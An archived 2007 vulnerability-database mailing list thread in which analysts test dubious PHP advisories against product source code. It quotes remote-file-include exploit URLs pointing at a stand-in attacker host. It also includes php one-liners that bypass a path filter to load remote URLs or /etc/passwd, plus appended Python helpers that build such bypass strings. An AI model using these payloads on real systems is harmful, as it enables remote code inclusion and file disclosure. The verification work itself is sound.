From coley at mitre.org Mon Jul 30 16:00:56 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 12:00:56 -0400 (EDT) Subject: [VIM] Adult Directory - site-specific? Message-ID: <200707301600.l6UG0ubM017048@faron.mitre.org> Refs: http://www.milw0rm.com/exploits/4238 FrSIRT/ADV-2007-2695 One of our analysts observed: There is a substantial inconsistency in how the researcher specifies the product; it is not known whether the actual product is site-specific. In particular, the researcher says photo.sourceforge.net, which points to a SourceForge project named Photo Collection. There is only one version of Photo Collection available at SourceForge (1.3.1, from 20000803). This version does not have a directory.php or any use of cat_id. Also, the download has no mention of "Adult." The researcher provides a DORK field apparently intended for locating installations of the product, but nothing relevant was found as of 20070730. It is conceivable that the product in question is a distributable variant of the SourceForge Photo Collection product, with additional components such as directory.php. Anybody have more info? - Steve

From coley at mitre.org Mon Jul 30 16:31:07 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 12:31:07 -0400 (EDT) Subject: [VIM] Remote File Inclusion: it's not just for PHP anymore Message-ID: <200707301631.l6UGV7nu017710@faron.mitre.org> I thought this was interesting: MILW0RM:4226 http://www.milw0rm.com/exploits/4226 It's an ActiveX control with an absolute path traversal vulnerability, probably stemming from unrestricted/unauthenticated access to a powerful method (these kinds of problems are giving me minor fits in terms of how to classify them). The "GetToFile" method apparently accepts a URL and a target filename as arguments.
Come to think of it, I bet you see this in a lot of ActiveX controls that either (1) perform installation or updates for a product, or (2) do a lot of heavy file transfers back and forth. - Steve From str0ke at milw0rm.com Mon Jul 30 17:52:47 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 30 Jul 2007 12:52:47 -0500 Subject: [VIM] Adult Directory - site-specific? In-Reply-To: <200707301600.l6UG0ubM017048@faron.mitre.org> References: <200707301600.l6UG0ubM017048@faron.mitre.org> Message-ID: <814b9d50707301052q3e1cf0b0oa751e32e77cbb1a8@mail.gmail.com> Hey Steve, Here is the information I have. site: http://www.prozilla.com/ product: http://www.prozilla.com/item.php?item=65 demo: http://www.turnkeyzone.com/demos/adultdir/ /str0ke On 7/30/07, Steven M. Christey wrote: > > Refs: > > http://www.milw0rm.com/exploits/4238 > FrSIRT/ADV-2007-2695 > > One of our analysts observed: > > There is a substantial inconsistency in how the researcher specifies > the product; it is not known whether the actual product is > site-specific. In particular, the researcher says > photo.sourceforge.net, which points to a SourceForge project named > Photo Collection. There is only one version of Photo Collection > available at SourceForge (1.3.1, from 20000803). This version does > not have a directory.php or any use of cat_id. Also, the download > has no mention of "Adult." The researcher provides a DORK field > apparently intended for locating installations of the product, but > nothing relevant was found as of 20070730. It is conceivable that > the product in question is a distributable variant of the > SourceForge Photo Collection product, with additional components > such as directory.php. > > > Anybody have more info? > > - Steve > From coley at mitre.org Mon Jul 30 21:14:17 2007 From: coley at mitre.org (Steven M. 
Christey) Date: Mon, 30 Jul 2007 17:14:17 -0400 (EDT) Subject: [VIM] SeaMonkey 1.1.3 coverage Message-ID: <200707302114.l6ULEHwx022231@faron.mitre.org> as prompted by this: ftp://ftp.slackware.com/pub/slackware/slackware-12.0/ChangeLog.txt SECUNIA:26205 The changelog says "Upgraded to seamonkey-1.1.3. This is presumably a security update, but the details on the net have been sparse. So far nothing has appeared at the usual URL" Josh Bressers of Red Hat, who works closely on the Mozilla product line, has confirmed to me that the issues for this release are the same as those mentioned in RHSA-2007-0722: http://rhn.redhat.com/errata/RHSA-2007-0722.html Specifically: CVE-2007-3089 CVE-2007-3656 CVE-2007-3734 CVE-2007-3735 CVE-2007-3736 CVE-2007-3737 CVE-2007-3738 The associated Mozilla advisories do *not* mention SeaMonkey at all, and the Mozilla security page includes a pointer to a 1.1.3 list of vulns, but it's not up yet. - Steve From theall at tenablesecurity.com Mon Jul 30 23:39:42 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 19:39:42 -0400 Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <200707302114.l6ULEHwx022231@faron.mitre.org> References: <200707302114.l6ULEHwx022231@faron.mitre.org> Message-ID: <46AE76BE.60505@tenablesecurity.com> On 07/30/07 17:14, Steven M. Christey wrote: > The associated Mozilla advisories do *not* mention SeaMonkey at all, Actually, they do -- http://www.mozilla.org/security/announce/2007/mfsa2007-18.html lists Seamonkey in the list of products affected by the issues. That advisory maps to CVE-2007-3734 and CVE-2007-3735 and corresponds to a number of bug ids. I tried looking at 10+ of those bug ids; anonymous access is prohibited for all but 344300, which doesn't mention Seamonkey per se. > and the Mozilla security page includes a pointer to a 1.1.3 list of > vulns, but it's not up yet. Yeah, I noticed that last week. Odd. 
Still, SeaMonkey 1.1.3 is out and the news report at http://www.mozilla.org/projects/seamonkey/news.html#2007-07-19 claims it "closes several security vulnerabilities". George -- theall at tenablesecurity.com

From theall at tenablesecurity.com Tue Jul 31 00:19:37 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 20:19:37 -0400 Subject: [VIM] WTF: BellaBiblio Admin Login Bypass Message-ID: <46AE8019.5030907@tenablesecurity.com> I must be losing it... ilker kandemir posted a recent advisory to SecurityFocus about a way to bypass authentication in BellaBiblio: http://www.securityfocus.com/archive/1/475103/30/0/threaded quotes the following code snippet:

if (isset($_COOKIE['bellabiblio'])) {
    if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
        if (isset($_GET['ap'])) $page = $_GET['ap'];
        else $page = "";

and then says you just need to set the 'bellabiblio' cookie to 'administrator' when calling the admin.php to bypass authentication. Hello? md5() returns a 32-byte hash, so how in the world can that ever equal 'administrator'??? So unless I'm having a really bad start to the week, it looks like Bugtraq 25140 is bogus. George -- theall at tenablesecurity.com

From coley at linus.mitre.org Tue Jul 31 00:23:15 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 20:23:15 -0400 (EDT) Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <46AE76BE.60505@tenablesecurity.com> References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> Message-ID: On Mon, 30 Jul 2007, George A. Theall wrote: > > On 07/30/07 17:14, Steven M. Christey wrote: > > The associated Mozilla advisories do *not* mention SeaMonkey at all, > > Actually, they do -- > http://www.mozilla.org/security/announce/2007/mfsa2007-18.html lists > Seamonkey in the list of products affected by the issues. Naturally, you had to point out a counter-example. I must admit only checking about 3 Mozilla advisories.
As a counter-counter-example ;-) http://www.mozilla.org/security/announce/2007/mfsa2007-19.html is associated with CVE-2007-3736, which is in the Red Hat advisory but doesn't mention SeaMonkey. Similar for 2007-25, 24, 21, and 20. So I guess we have some more inconsistencies on top of everything else. - Steve From theall at tenablesecurity.com Tue Jul 31 00:26:43 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 20:26:43 -0400 Subject: [VIM] WTF: Phorm v3.0 Remote File Upload Vulnerability Message-ID: <46AE81C3.3040100@tenablesecurity.com> Another questionable advisory from ilker kandemir: Phorm v3.0 Remote File Upload Vulnerability lists as an exploit: http://[site]/[phorm_path]/lib/fileupload.php Only trouble is, version 3.0 is distributed with a .htaccess file in lib/ that prevents direct access to files in that directory. And the first line of code in the file reads: if (isset($PHP_SELF) && !eregi("^phorm.php", basename($PHP_SELF))) return; While I realize there are ways around this check, the PoC as written in the advisory won't do that. George -- theall at tenablesecurity.com From coley at linus.mitre.org Tue Jul 31 00:32:37 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 20:32:37 -0400 (EDT) Subject: [VIM] WTF: BellaBiblio Admin Login Bypass In-Reply-To: <46AE8019.5030907@tenablesecurity.com> References: <46AE8019.5030907@tenablesecurity.com> Message-ID: I just downloaded the source code and it's as you described. Looks wrong to me, too - $admin_name etc. are hard-coded in config.php, which is included just before this code. Not to mention that "administrator" isn't a valid md5 result :) - Steve From theall at tenablesecurity.com Tue Jul 31 00:44:20 2007 From: theall at tenablesecurity.com (George A. 
Theall) Date: Mon, 30 Jul 2007 20:44:20 -0400 Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> Message-ID: <46AE85E4.6030001@tenablesecurity.com> On 07/30/07 20:23, Steven M. Christey wrote: > Naturally, you had to point out a counter-example. I must admit only > checking about 3 Mozilla advisories. Well, I did check them all last week when I wrote the recent Nessus plugin for it. And this was the only one of the recent bunch that mentioned Seamonkey, at least when I checked. > So I guess we have some more inconsistencies on top of everything else. Are you talking about inconsistencies in Redhat's advisory? Their bug report (248518) seems to lump Firefox / Thunderbird / Seamonkey together. Notice that RHSA-2007-0723 (covering Thunderbird) lists the same set of CVEs, except for CVE-2007-3656, as RHSA-2007-0722 (covering Seamonkey) even though if you cross-reference the advisories, you'll see that only CVE-2007-3734 and CVE-2007-3735 apply. George -- theall at tenablesecurity.com From theall at tenablesecurity.com Tue Jul 31 00:45:50 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 20:45:50 -0400 Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <46AE85E4.6030001@tenablesecurity.com> References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> <46AE85E4.6030001@tenablesecurity.com> Message-ID: <46AE863E.1040504@tenablesecurity.com> On 07/30/07 20:44, George A. Theall wrote: > Are you talking about inconsistencies in Redhat's advisory? Their bug > report (248518) seems to lump Firefox / Thunderbird / Seamonkey > together. Notice that RHSA-2007-0723 (covering Thunderbird) lists the > same set of CVEs, except for CVE-2007-3656, as RHSA-2007-0722 (covering > Seamonkey) even though if you cross-reference the advisories, you'll see > that only CVE-2007-3734 and CVE-2007-3735 apply. 
^---- apply to Thunderbird. George -- theall at tenablesecurity.com

From coley at mitre.org Tue Jul 31 00:59:37 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 20:59:37 -0400 (EDT) Subject: [VIM] true: Madoa RFI Message-ID: <200707310059.l6V0xbk4025295@faron.mitre.org> I investigated this because ilker kandemir is the same researcher who reported the apparently-incorrect BellaBiblio issue. However, this one is clearly true. Both index.php and vote.php contain this code in the first line: require ($Madoa . "config.php"); admin.php has a preceding require of functions/general.php, but that's just (surprise) function definitions. - Steve

From bressers at redhat.com Tue Jul 31 01:12:04 2007 From: bressers at redhat.com (Josh Bressers) Date: Mon, 30 Jul 2007 21:12:04 -0400 Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <46AE85E4.6030001@tenablesecurity.com> References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> <46AE85E4.6030001@tenablesecurity.com> Message-ID: <23197.1185844324@devserv.devel.redhat.com> > > > So I guess we have some more inconsistencies on top of everything else. > > Are you talking about inconsistencies in Redhat's advisory? Their bug > report (248518) seems to lump Firefox / Thunderbird / Seamonkey > together. Notice that RHSA-2007-0723 (covering Thunderbird) lists the > same set of CVEs, except for CVE-2007-3656, as RHSA-2007-0722 (covering > Seamonkey) even though if you cross-reference the advisories, you'll see > that only CVE-2007-3734 and CVE-2007-3735 apply. > What inconsistencies do you speak of? I admit it's possible there are errors, but for reasons I won't get into, I trust the current Red Hat advisories more than the upstream Mozilla advisories at this time. I fail to understand why you say only CVE-2007-3734 and CVE-2007-2735 apply to Thunderbird. Where did this information come from?
-- JB From coley at linus.mitre.org Tue Jul 31 01:21:30 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 21:21:30 -0400 (EDT) Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <46AE85E4.6030001@tenablesecurity.com> References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> <46AE85E4.6030001@tenablesecurity.com> Message-ID: On Mon, 30 Jul 2007, George A. Theall wrote: > On 07/30/07 20:23, Steven M. Christey wrote: > > > So I guess we have some more inconsistencies on top of everything else. > > Are you talking about inconsistencies in Redhat's advisory? Sorry, I meant that some Mozilla advisories mentioned SeaMonkey and others did not, even though SeaMonkey is apparently affected. At the moment, I'm treating the Red Hat advisories as best available information. - Steve From theall at tenablesecurity.com Tue Jul 31 01:42:30 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 21:42:30 -0400 Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <23197.1185844324@devserv.devel.redhat.com> References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> <46AE85E4.6030001@tenablesecurity.com> <23197.1185844324@devserv.devel.redhat.com> Message-ID: <46AE9386.8050604@tenablesecurity.com> On 07/30/07 21:12, Josh Bressers wrote: > What inconsistencies do you speak of? I was only asking for clarification from Steve there. > I admit it's possible there are > errors, but for reasons I won't get into, I trust the current Red Hat > advisories more than the upstream Mozilla advisories at this time. > I fair to understand why you say only CVE-2007-3734 and CVE-2007-2735 apply > to Thunderbird. Where did this information come from? It's from looking at MFSA 2007-18 - MFSA 2007-25: only MFSA 2007-18 and MFSA 2007-23 list Thunderbird as affected. [MFSA 2007-23 does cross-reference CVE-2007-3670, but that CVE entry concerns IE.] 
But searching for mention of Thunderbird in the descriptions of the CVEs listed in RHSA-2007-0723 leads me to the same conclusion. I unfortunately don't have access to most of the underlying bug reports on Mozilla.org, so it's quite possible I'm off-base here. George -- theall at tenablesecurity.com

From theall at tenablesecurity.com Tue Jul 31 02:06:16 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 22:06:16 -0400 Subject: [VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability Message-ID: <46AE9918.7060409@tenablesecurity.com> Another advisory from ilker Kandemir: http://archives.neohapsis.com/archives/bugtraq/2007-07/0365.html Sample exploit: check_entry.php?dir_abs_src=http://attacker.php? Actual code from 2006-06-24_v10:

---- snip, snip, snip ----
function rig_check_src_file($name) {
    ...
    // disable auto-globals from CGI params -- RM 20060624 - v1.0
    ini_set("register_globals", "0");
    // complain if that didn't work
    if (ini_get("register_globals") == 1) {
        echo "RIG Security Error";
        ...
        exit;
    }
    ...
    $name = str_replace("..", ".", str_replace("://", "", $name));
    ...
    return $name;
}
...
require_once(rig_check_src_file($dir_abs_src . "entry_point.php"));
---- snip, snip, snip ----

By the way, there is no executable PHP code before the function definition. I don't think any version of PHP allows for changing register_globals via ini_set() -- see -- which is probably why the author checks whether it is set and exits if so. But regardless, the str_replace() later on in rig_check_src_file() would certainly void the possibility of a remote file include attack. George -- theall at tenablesecurity.com

From theall at tenablesecurity.com Tue Jul 31 02:22:55 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 22:22:55 -0400 Subject: [VIM] WTF: phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability Message-ID: <46AE9CFF.9050600@tenablesecurity.com> Yet another advisory from ilker Kandemir: http://archives.neohapsis.com/archives/bugtraq/2007-07/0366.html Sample exploit: index.php?PN_PathPrefix=http://attacker.txt? Actual code from index.php from phpWebFileManager v0.5:

---- snip, snip, snip ----
$fm_init_file = dirname(__FILE__) . (strlen(dirname(__FILE__)) > 0 ? '/' : '') . 'init.inc.php';
if (! @file_exists($fm_init_file)) {
    exit;
}
require_once $fm_init_file;

/*
 * Libraries function inclusion
 */
require_once $PN_PathPrefix . 'functions.inc.php';
---- snip, snip, snip ----

So index.php first determines the location of its init.inc.php file and then requires it.
Actual code from init.inc.php from phpWebFileManager v0.5:

---- snip, snip, snip ----
$ModName = null;
$PN_PathPrefix = '';
if (defined('LOADED_AS_MODULE')) {
    $ModName = basename(dirname(__FILE__));
    $PN_PathPrefix = "modules/$ModName/";
} else {
    $PN_PathPrefix = dirname(__FILE__);
    $PN_PathPrefix .= '/';
}
---- snip, snip, snip ----

init.inc.php includes several other files, but I didn't see any that might allow an attacker to override $PN_PathPrefix via some sort of register_globals emulation. George -- theall at tenablesecurity.com

From str0ke at milw0rm.com Tue Jul 31 11:18:24 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 31 Jul 2007 06:18:24 -0500 Subject: [VIM] WTF: BellaBiblio Admin Login Bypass In-Reply-To: References: <46AE8019.5030907@tenablesecurity.com> Message-ID: <814b9d50707310418n7f9d15c4i20e651d0e6bffcef@mail.gmail.com> He's been sending them into milw0rm for the past week, he knows they don't work. /str0ke On 7/30/07, Steven M. Christey wrote: > > I just downloaded the source code and it's as you described. Looks wrong > to me, too - $admin_name etc. are hard-coded in config.php, which is > included just before this code. Not to mention that "administrator" isn't > a valid md5 result :) > > - Steve >

From ascii at katamail.com Tue Jul 31 15:09:41 2007 From: ascii at katamail.com (ascii) Date: Tue, 31 Jul 2007 17:09:41 +0200 Subject: [VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability In-Reply-To: <46AE9918.7060409@tenablesecurity.com> References: <46AE9918.7060409@tenablesecurity.com> Message-ID: <46AF50B5.30709@katamail.com> George A. Theall wrote: > But regardless, the str_replace() later on in rig_check_src_file() > would certainly void the possibility of a remote file include attack. I'm not saying that the product is vulnerable but that this statement is completely flawed, rig_check_src_file() is mostly useless (assumption taken from George's code snippet, I haven't downloaded the original script).
function rig_check_src_file($name) {
    ...
    $name = str_replace("..", ".", str_replace("://", "", $name));
    ...
    return $name;
}

This alone permits both local and remote file inclusions:

Example a) Remote file inclusion

php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".", str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
http://www.tin.it/

Warning: require_once(): URL file-access is disabled in the server configuration in Command line code on line 1

Warning: require_once(http://www.tin.it/): failed to open stream: no suitable wrapper could be found in Command line code on line 1

Fatal error: require_once(): Failed opening required 'http://www.tin.it/' (include_path='.:/usr/share/php5:/usr/share/php') in Command line code on line 1

Example b) Local file inclusion

php -r '$name=".../.../.../etc/passwd"; $name = str_replace("..", ".", str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
../../../etc/passwd

Warning: require_once(../../../etc/passwd): failed to open stream: No such file or directory in Command line code on line 1

Fatal error: require_once(): Failed opening required '../../../etc/passwd' (include_path='.:/usr/share/php5:/usr/share/php') in Command line code on line 1

Best regards, Francesco `ascii` Ongaro http://www.ush.it/

From str0ke at milw0rm.com Tue Jul 31 13:19:55 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 31 Jul 2007 08:19:55 -0500 Subject: [VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability In-Reply-To: <46AF50B5.30709@katamail.com> References: <46AE9918.7060409@tenablesecurity.com> <46AF50B5.30709@katamail.com> Message-ID: <814b9d50707310619u3992262fv222df3b829ee5f6@mail.gmail.com>

// disable auto-globals from CGI params -- RM 20060624 - v1.0
ini_set("register_globals", "0");
// complain if that didn't work
if (ini_get("register_globals") == 1) {
    echo "RIG Security Error";
    ...
    exit;
}

With register globals = off he wouldn't be able to initialize the variable anyways correct? /str0ke On 7/31/07, ascii wrote: > George A. Theall wrote: > > But regardless, the str_replace() later on in rig_check_src_file() > > would certainly void the possibility of a remote file include attack. > > I'm not saying that the product is vulnerable but that this statement > is completely flawed, rig_check_src_file() is mostly useless (assumption > taken from the George's code snippet, I haven't downloaded the original > script). > > function rig_check_src_file($name) { > ... > $name = str_replace("..", ".", str_replace("://", "", $name)); > ... > return $name; > } > > This alone permits both local and remote file inclusions: > > Example a) Remote file inclusion > > php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".", > str_replace("://", "", $name)); echo $name."\n"; require_once($name);' > http://www.tin.it/ > > Warning: require_once(): URL file-access is disabled in the server > configuration in Command line code on line 1 > > Warning: require_once(http://www.tin.it/): failed to open stream: no > suitable wrapper could be found in Command line code on line 1 > > Fatal error: require_once(): Failed opening required > 'http://www.tin.it/' (include_path='.:/usr/share/php5:/usr/share/php') > in Command line code on line 1 > > Example b) Local file inclusion > > php -r '$name=".../.../.../etc/passwd"; $name = str_replace("..", ".", > str_replace("://", "", $name)); echo $name."\n"; require_once($name);' > ../../../etc/passwd > > Warning: require_once(../../../etc/passwd): failed to open stream: No > such file or directory in Command line code on line 1 > > Fatal error: require_once(): Failed opening required > '../../../etc/passwd' (include_path='.:/usr/share/php5:/usr/share/php') > in Command line code on line 1 > > Best regards, > Francesco `ascii` Ongaro > http://www.ush.it/ > > > >

From theall at tenablesecurity.com Tue Jul 31 13:26:39
2007 From: theall at tenablesecurity.com (George A. Theall) Date: Tue, 31 Jul 2007 09:26:39 -0400 Subject: [VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability In-Reply-To: <46AF50B5.30709@katamail.com> References: <46AE9918.7060409@tenablesecurity.com> <46AF50B5.30709@katamail.com> Message-ID: <46AF388F.4040409@tenablesecurity.com> On 07/31/07 11:09, ascii wrote: > George A. Theall wrote: >> But regardless, the str_replace() later on in rig_check_src_file() >> would certainly void the possibility of a remote file include attack. > > I'm not saying that the product is vulnerable but that this statement > is completely flawed, ... > php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".", > str_replace("://", "", $name)); echo $name."\n"; require_once($name);' > http://www.tin.it/ You're right, of course. But along with the register_globals check it does prevent the example exploit from working. George -- theall at tenablesecurity.com From ascii at katamail.com Tue Jul 31 15:43:41 2007 From: ascii at katamail.com (ascii) Date: Tue, 31 Jul 2007 17:43:41 +0200 Subject: [VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability In-Reply-To: <814b9d50707310619u3992262fv222df3b829ee5f6@mail.gmail.com> References: <46AE9918.7060409@tenablesecurity.com> <46AF50B5.30709@katamail.com> <814b9d50707310619u3992262fv222df3b829ee5f6@mail.gmail.com> Message-ID: <46AF58AD.9000105@katamail.com> str0ke wrote: > With register globals = off he wouldn't be able to initialize the > variable anyways correct? Yes, the advisory is fake. (I was just pointing out that the exploit blocker was not the str_replace()) Best regards, Francesco `ascii` Ongaro http://www.ush.it/
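Editor's added example for the RIG thread above (this is not code from RIG, from the advisory, or from anyone on the list). It re-creates the single-pass str_replace() filter that George quoted and the two bypass shapes ascii demonstrated, generalises them to any scheme://host URL and any ../ path (craft_remote and craft_traversal are my names), and pairs them with a reject-based check (strict_check, also mine, and hypothetical) of the kind that actually closes the hole: refuse anything that is not a relative path of plain segments rather than trying to scrub it. As the thread concludes, the advisory's own PoC is neutered by the filter; it is the register_globals check that stops the variable being set at all, and the filter would not save the day on its own.

```python
import re


def rig_filter(name: str) -> str:
    """Re-creation of the RIG 1.0 check quoted in the thread:
    str_replace("..", ".", str_replace("://", "", $name)).
    PHP str_replace() and Python str.replace() both make one left-to-right,
    non-overlapping pass, which is exactly what the bypasses below rely on."""
    return name.replace("://", "").replace("..", ".")


def craft_remote(url: str) -> str:
    """Build ascii's shape for any scheme://host/path URL (e.g. http:/:///www.tin.it/):
    the filter deletes the inner '://' and the survivors re-form 'scheme://'."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        raise ValueError("expected a scheme://host URL")
    return f"{scheme}:/:///{rest}"


def craft_traversal(path: str) -> str:
    """Write each '../' as '.../': one pass of '..' -> '.' turns it back into '../'."""
    return path.replace("../", ".../")


# Hypothetical replacement check (not RIG's code): refuse instead of sanitise.
_SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9_.-]+$")


def strict_check(name: str) -> bool:
    """True only for a relative path made of plain segments."""
    if "\x00" in name or ":" in name or "\\" in name or name.startswith("/"):
        return False  # NUL, any scheme or wrapper (http://, php://, data:), absolute path
    for segment in name.split("/"):
        if not _SAFE_SEGMENT.match(segment):
            return False  # empty segment ('//', trailing '/') or unexpected characters
        if segment.strip(".") == "":
            return False  # '.', '..', '...' and longer dot runs
    return True


def demo() -> dict:
    """Run the advisory's PoC, ascii's two bypasses and a legitimate value
    through both checks; returns {label: (after rig_filter, strict_check verdict)}."""
    cases = {
        "advisory PoC": "http://attacker.php?",               # from the Bugtraq post
        "ascii remote": craft_remote("http://www.tin.it/"),    # http:/:///www.tin.it/
        "ascii local": craft_traversal("../../../etc/passwd"), # .../.../.../etc/passwd
        "legitimate": "gallery/entry_point.php",               # constructed sample
    }
    return {label: (rig_filter(v), strict_check(v)) for label, v in cases.items()}


if __name__ == "__main__":
    for label, (filtered, accepted) in demo().items():
        print(f"{label:13s} after filter: {filtered!r:<32} strict_check: {accepted}")
```

Running it shows the advisory's PoC collapsing to httpattacker.php? while ascii's two inputs come out of the filter as a working URL and a working traversal; strict_check rejects all three and keeps the legitimate path.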
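Editor's added example for the BellaBiblio thread above (not BellaBiblio's code and not anything posted by the list members). It models the quoted admin.php test, $_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret), so the claim in the thread can be checked mechanically: the literal cookie 'administrator' can never equal a 32-character hex digest. The config values are constructed stand-ins for whatever a site has in config.php. The one caveat a reviewer would add to George's and Steve's reading is about PHP's loose == rather than about this product: when both operands are numeric strings PHP compares them as numbers, so a cookie such as "0e1" would match any digest of the form 0e followed only by digits. Whether a given site's digest has that form depends on its secret, and nothing in the thread says it does; php_loose_eq below is a simplified model of that rule, and strict_admin shows the comparison the check should use instead.

```python
import hashlib
import hmac
import re

# Constructed stand-ins for the values hard-coded in config.php (assumption).
ADMIN_NAME = "admin"
ADMIN_PASS = "hunter2"
SECRET = "example-site-secret"


def expected_cookie(admin_name: str = ADMIN_NAME, admin_pass: str = ADMIN_PASS,
                    secret: str = SECRET) -> str:
    """md5($admin_name.$admin_pass.$secret): 32 lowercase hex characters."""
    return hashlib.md5((admin_name + admin_pass + secret).encode("utf-8")).hexdigest()


# A string PHP treats as numeric: optional sign, digits/decimal, optional exponent.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_eq(a: str, b: str) -> bool:
    """Simplified model of PHP's == between two strings: if both are numeric
    strings they are compared as numbers, otherwise byte for byte. Enough for
    a cookie-versus-hex-digest comparison; it does not cover every PHP corner."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def bellabiblio_admin(cookie: str, **config) -> bool:
    """The quoted admin.php test, with PHP's loose == modelled."""
    return php_loose_eq(cookie, expected_cookie(**config))


def strict_admin(cookie: str, **config) -> bool:
    """What the check should be: exact, constant-time comparison of the digest."""
    return hmac.compare_digest(cookie.encode("utf-8"),
                               expected_cookie(**config).encode("utf-8"))


if __name__ == "__main__":
    print("PoC cookie 'administrator' accepted:", bellabiblio_admin("administrator"))
    print("genuine digest accepted:", bellabiblio_admin(expected_cookie()))
    print("PHP '0e1' == '0e2':", php_loose_eq("0e1", "0e2"))
```

The first two lines of output confirm the thread's verdict on Bugtraq 25140; the third is the general == caveat, which strict_admin avoids by comparing bytes in constant time.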